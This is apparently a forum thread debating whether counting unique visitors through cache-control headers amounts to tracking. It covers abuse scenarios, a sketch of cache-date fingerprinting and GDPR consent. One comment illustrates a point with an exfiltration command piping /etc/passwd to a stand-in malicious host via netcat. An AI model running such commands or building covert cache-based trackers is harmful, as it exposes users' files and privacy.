Counting is not the same as tracking. The technique proposed would in most cases be useless for trying to distinguish individuals, much less identify them. It's the computer equivalent of the person standing out in front of Costco with a clicker counter.
In principle, screen resolution would in most cases be useless for trying to distinguish individuals. After all, it wouldn't even distinguish the underlying hardware, let alone a user of that hardware. But given omnipresent tracking, it's one more bit that can be used to identify you.
In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.
* For each new user, select a random "late-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.
* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.
And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.
That is a different technique that uses the same medium of storage. When I say "this technique" I'm referring to specifically what was discussed in the article.
"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.
I agree that it is clever, and it is new to me as well. However, saying that an obvious extension to a technique (posted by multiple people independently, no less) is a different technique altogether and therefore not germane is going a bit far.
If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.
This kind of attack isn't new, though, trackers have been using side channel tracking forever now. A quick search shows that this exact side channel tracking vulnerability was discussed in the year 2000 [0].
I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.
I wasn't attempting to dogpile, and am sorry if it came across that way. I agree that this scheme would, if used as a replacement for cookies in the manner described by the OP, be a strict improvement on the current state. That's the first step in evaluating a proposed privacy improvement.
However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.
1. How would a non-malicious actor implement the proposed system?
2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?
3. What could a malicious actor do with that minimal amount of information?
4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?
Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:
1. As described in the original post.
2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.
3. Answered in previous comments, that malicious actors could use this to reproduce the same information as is stored in cookies.
4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.
When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.
Of course this technique could be abused by a bad actor. That's true of literally everything in computing. Do you think we should ban encryption because bad people might encrypt stuff?
TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.
Counting is not tracking, but counting unique visitors requires tracking to know they are unique. If the person outside of Costco is counting unique visitors, they must be tracking who has already visited and who has not. Even if they aren't doing anything else with that information and forgetting it each night, it is tracking. The existing abuse of tracking has led to a level of backlash where any tracking is seen through the worst possible lens.
It doesn't require tracking. Tracking would mean I could tell that user x has returned n times. But I have no idea who has returned, only that someone has returned n times.
The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.
As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.
That's still a form of tracking. Maybe not enough to identify unique users in some use cases, but even just knowing someone has been here n times is enough if the user numbers are low enough that you can identify users by unique n counts and patterns of n (such as if one user is at 500 and another is at 490, if the second one is logging in daily while the first one hasn't logged in for a few months, and you see the 490 go 491, 492... when they go from 499 to 500, the chance when a 500 logs on tomorrow and becomes 501 it was the 490 account that has been logging in daily).
Must admit, I've never thought of "number of times I've visited your site" as PII. Number of times I've visited every site in my browser history, maybe, but not "number of times I've visited this specific site". I'm thinking about it, but I'm not immediately convinced.
That's because you're forgetting the temporal domain. As in GP's example, a count alone may not mean much, but a time series of counts will allow you to uniquely identify a subset of the users.
Kinda need one for the other if you want to distinguish different users vs just one user clicking a lot.
You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, using whatever way, you are tracking user.
No, you don't need an ID. The article has one implementation that avoids IDs, but here's a simpler one:
Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.
Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.
The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.
Yes, but whether you legally must get consent is a separate question from whether you can count unique visitors while still being unable to tell them apart from each other.
Back in my days we called those "tracking pixels" and it didn't even need a cookie.
That's just not a real problem to solve. If you don't want to track users just giving each one unique ID is not a problem if you don't store them for future lookup.
The fact remains that from client perspective client have no way of telling whether you track them or not so you can't really prove to user you're not tracking them.
Reminder that the GDPR does not care about cookies specifically but about personal data and tracking in general. Using the the cache invalidation for tracking does not require any less consent then the equivalent cookie.
However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:
> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.
Its not like that is a far walk though. Its the exact same technique, just storing different data.
Respectfully i feel like this would be like seeing an example of css turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.
If a bunch of people got up in arms and started complaining because the author of said CSS example hadn't considered that their code could be changed slightly to produce a hate symbol, I'd definitely still jump in and say "but that's not what they were doing!"